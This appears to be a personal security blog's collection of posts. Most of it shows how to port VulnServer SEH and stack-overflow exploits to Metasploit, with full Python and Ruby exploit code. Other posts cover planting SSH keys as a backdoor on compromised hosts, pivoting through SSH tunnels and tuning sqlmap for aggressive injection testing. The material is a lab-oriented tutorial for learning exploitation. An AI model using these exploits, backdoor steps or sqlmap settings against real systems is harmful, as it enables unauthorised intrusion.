Porting VunServer “GMON /” SEH exploit to Metasploit

Pre-requisites :  http://resources.infosecinstitute.com/seh-exploit/
Coerelan template : http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

Re-freshers of the SEH exploit

Now onto the python code 🙂

import sys
import struct
import socket

shellcode=("\xCC\xCC\xCC") #use your own Shellcode bad chars \x00\x0A\x0D
sehp = "\xEB\x0F\x90\x90"; # JMP 0F(15), NOP, NOP (POINTER TO NEXT SEH RECORD)
seho = struct.pack(' longjump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # JMP back 768 bytes
buffer= "\x90" * 2752 + "\x90" * 32 + shellcode + "\x90" * (714 - len(shellcode)) + sehp + seho + longjump + "D" *480
#makenops 2752 + 32 = 2784
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1',9999))
data=s.recv(1024)
s.send('GMON /' + buffer)
s.close()

This makes the metasploit exploit

# Metasploit template from corelan.be
# SEH for vunserver thegreycorner.com
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote # A remote exploit

include Msf::Exploit::Remote::Tcp # using TCP connection

def initialize(info = {})
super(update_info(info,
'Name' => 'Vunserver SEH exploit',
'Description' => %q{
This module exploits an SEH exploit in
vulnserver.
},
'Author' => [ 'Stephen Bradshaw','Duncan Winfrey' ],
'Version' => '$Revision: 9999 $',
'References' =>
[
[ 'Vunserver', 'http://www.thegreycorner.com/p/vulnserver.html' ],
[ 'corelan.be', 'http://tinyurl.com/64s3je4' ],
],

'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',

'Targets' =>
[
['Windows NT/2000/XP/2003 ',
{ 'Ret' => 0x625010b4,} ],
],
'DefaultTarget' => 0,

'Privileged' => false
))

register_options(
[
Opt::RPORT(9999)
], self.class)
end

def exploit
connect

request = 'GMON /'
request << rand_text_alpha_upper(2752)
request << make_nops(32)
request << payload.encoded
request << rand_text_alpha_upper((714 - payload.encoded.length))
request << "\xEB\x0F\x90\x90" # Short Jump
request << [target.ret].pack('V') # SEH Overwrite
request << "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # go back 768 bytes
request << rand_text_alpha_upper(480) # junk

sock.put(request)

handler
disconnect

end

The working module 🙂

 

 

Porting VulnServer TRUN /.:/ exploit to Metasploit

Pre-requisites  : http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

Bof Template used : https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

I followed the bof tutorial using python 🙂

The python version of the exploit looks like

[cc lang=”python”]
import struct
import socket
ret=”\xAF\x11\x50\x62″ #625011AF JMP ESP essfunc.dll
nop=”\x90″*32
shellcode=(“\xCC\xCC\xCC”) #use your own Shellcode bad chars \x00\x0A\x0D
buffer= “A”*2003 + ret + nop + shellcode + “D”*636
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘127.0.0.1’,9999))
s.recv(1024)
s.send(‘TRUN /.:/’ + buffer)
s.close()
[/cc]

To port to Metasploit you need to think about the type of exploit it is…remote windows. [cc lang=”ruby”]class Metasploit3 < Msf::Exploit::Remote[/cc]
This means you will need a TCP connection. [cc lang=”ruby”]include Msf::Exploit::Remote::Tcp[/cc]
Default port number for vunserver is 9999 [cc lang=”ruby”]9999 Opt::RPORT(9999)[/cc]
Then you will need to think about the elements of the buffer. sploit 🙂
The starting “TRUN /.:/” command, then the junk space, in Metasploit NOPS are used instead of “A”* 2003 using make_nops()
Next we need to know the return address that will be inside EIP, this will be 0x625011AF from essfunc.dll, this is universal as it’s from the vunserver program dll.
[cc lang=”ruby”]
‘Targets’ =>
[
[‘Windows XP Universal’,
{ ‘Ret’ => 0x625011af, ‘Offset’ => 2003 } ],
],
[/cc]
In the ‘payload’ section we add the amount of space allowed for shellcode and the bad chars
[cc lang=”ruby”]
‘Payload’ =>
{
‘Space’ => 900,
‘BadChars’ => “\x00\x0A\x0D”,
},
[/cc]
Then we need to add a nop slide because the shellcode will need space in memory to decode. payload.encoded handles all the payload encoding and decoding in memory, so no decoding nops needed, they are added just incase.
Then the amount of space for shellcode, in this case it’s around 900 which is loads of space for shellcode
This makes the final sploit
[cc lang=”ruby”]

sploit = ‘TRUN /.:/’ + junk + [target.ret].pack(‘V’) + make_nops(32) + payload.encoded

[/cc]
This makes the Metasploit module:

[cc lang=”ruby”]
# Metasploit template from corelan.be
# BoF for vunserver thegreycorner.com
require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote # A remote exploit

include Msf::Exploit::Remote::Tcp # using TCP connection

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Vunserver stack overflow’,
‘Description’ => %q{
This module exploits a stack overflow in a
vulnserver.
},
‘Author’ => [ ‘Stephen Bradshaw’,’Duncan Winfrey’ ],
‘Version’ => ‘$Revision: 9999 $’,
‘References’ =>
[
[ ‘Vunserver’, ‘http://www.thegreycorner.com/p/vulnserver.html’ ],
[ ‘corelan.be’, ‘http://tinyurl.com/64s3je4’ ],
],

‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘process’,
},
‘Payload’ =>
{
‘Space’ => 500,
‘BadChars’ => “\x00\x0A\x0D”,
},
‘Platform’ => ‘win’,

‘Targets’ =>
[
[‘Windows XP Universal’,
{ ‘Ret’ => 0x625011af, ‘Offset’ => 2003 } ],
],
‘DefaultTarget’ => 0,

‘Privileged’ => false
))

register_options(
[
Opt::RPORT(9999)
], self.class)
end

def exploit
connect

junk = make_nops(target[‘Offset’])
sploit = ‘TRUN /.:/’ + junk + [target.ret].pack(‘V’) + make_nops(32) + payload.encoded
sock.put(sploit)

handler
disconnect

end

end
[/cc]

Then put the code into /opt/metasploit/msf3/modules/exploits/windows/misc as vun_server_bof.rb

Then tested it out 😀

Backdoor Linux using SSH keys

In the penetrating with backtrack labs on viewing the/etc/passwd it’s sometimes full of other students usernames which is not very stealthy and is very noticeable, it also opens up additional vulnrablites if it were  a real pentest.

It is far easier to add your own ssh key to the root/.ssh/authorized_keys

 

First create your ssh key with the command below and hit enter a few times:

$ ssh-keygen

This will create a few files in /root/.ssh/ including id_rsa.pub

Once created you need to copy the contents of your “id_rsa.pub” to end of the authorized_keys file on the compromised host.

This is usually in /root/.ssh/authorized_keys

Then you can just ssh -p 22 root@IP and you will be logged in as root.

 

Simple port killing bash script

Sometimes a port is left listeing from a process that was not properly killed. This simple bash script should kill that port.
[cc lang=”bash”]
#!/bin/bash
killport=$1
process=$(netstat -tulpn | grep “$killport” | cut -d”/” -f1 | cut -d” ” -f44)
kill -9 “$process”
[/cc]

Using HTTP proxy tools over SSH tunnels

When pivoting through a Linux box I wanted to use Dirbuster through the ssh tunnel.

Unfortunately DirBuster does not support SOCKS5 proxies, therefore I decided to use a tool called polipo.

Polipo allows you to have a parent socks5 proxy that is then used to make  a local http proxy on a port you specify.

I used the default config file from TOR. Config file

To get it working:

$polipo -c torconfig

Established listening socket on port 8118.

Then connect to the pivot machine using

$ ssh -p 22 -D 127.0.0.1:9050 rootuser@192.168.1.31

Leave both console windows open and then

Config the tool you want to use localhost:1881

 

C++ Star catcher game

This is a game I made for my C++ OOP module

The aim of the game is to keep the score above zero.

Score starts at 10. Every star you miss you lose 2 points and every star you catch you gain 2.

Download Source : Star_Game

How Unique Is Your Browser?

A web browser does not simply just download and serve html anymore. Browsers have many features additional features that can be detected such as which version of flash your running, java and all add-ons you have installed which is can act as a very good fingerprint that be used to track people.

From the data collected 1 in 286,777 browers are unique, so from a legal point it would not stand in court.

You can test your brower uniqueness below

https://panopticlick.eff.org/index.php

The electronic froniter foundation has an excellant paper on browser uniqueness

https://panopticlick.eff.org/browser-uniqueness.pdf

 

Configuring sqlmap

Sqlmap is a great opensource Sqlinjection tool that I use to aide my learning using it’s -v switch that sets the output verbosity so you can see and learn the sql payload sqlmap is sending. I usally set it to -v3

By default sqlmap tests for blind SQL injection first which is more often successful but is very slow at extracting data and is hard to follow.

The full default order is blind,error,union,stacked,time. “BEUST”

I prefer to use union,error,stacked,blind,time. “UESBT”

To change the default in sqlmap open up sqlmap.conf

On line 236 tech = BEUST to tech = UESBT

Sqlmap by default does not try all the diffrent types of sql injections as some are too noisy/risky.

This can mean that exploitable injections are missed. To avoid this sqlmap can be configured to test for all types of injection by changing level and risk settings.

On line 195 you can change the level = 1 to level = 5

On line 202 you can change the risk = 1 to risk = 3

By deafult sqlmap will only test for 10 colunmns when using UNION sql inection, this is to low in most cases. I change the default to 50.

You can change this on line 246 uCols = 50

There are loads of other options you can change in sqlmap these are just a few 🙂

 

Running foremost on windows

Foremost is a Linux fornensics tool but can be run under windows using cygwin.

First install Cygwin , Install to the default location.

Then download a cygwin compiled version of foremost from a mirror here

Extract  foremost.exe and it’s config file to C:\cygwin\home\~your pc username

Then go to C:\cygwin and run Cygwin.bat#

Then you can run formost via the cygwin CLI

./foremost.exe -t all -i somecase.dd -T

😀

Sources used  : http://www.dcheeseman.com/blog/post/foremost-windows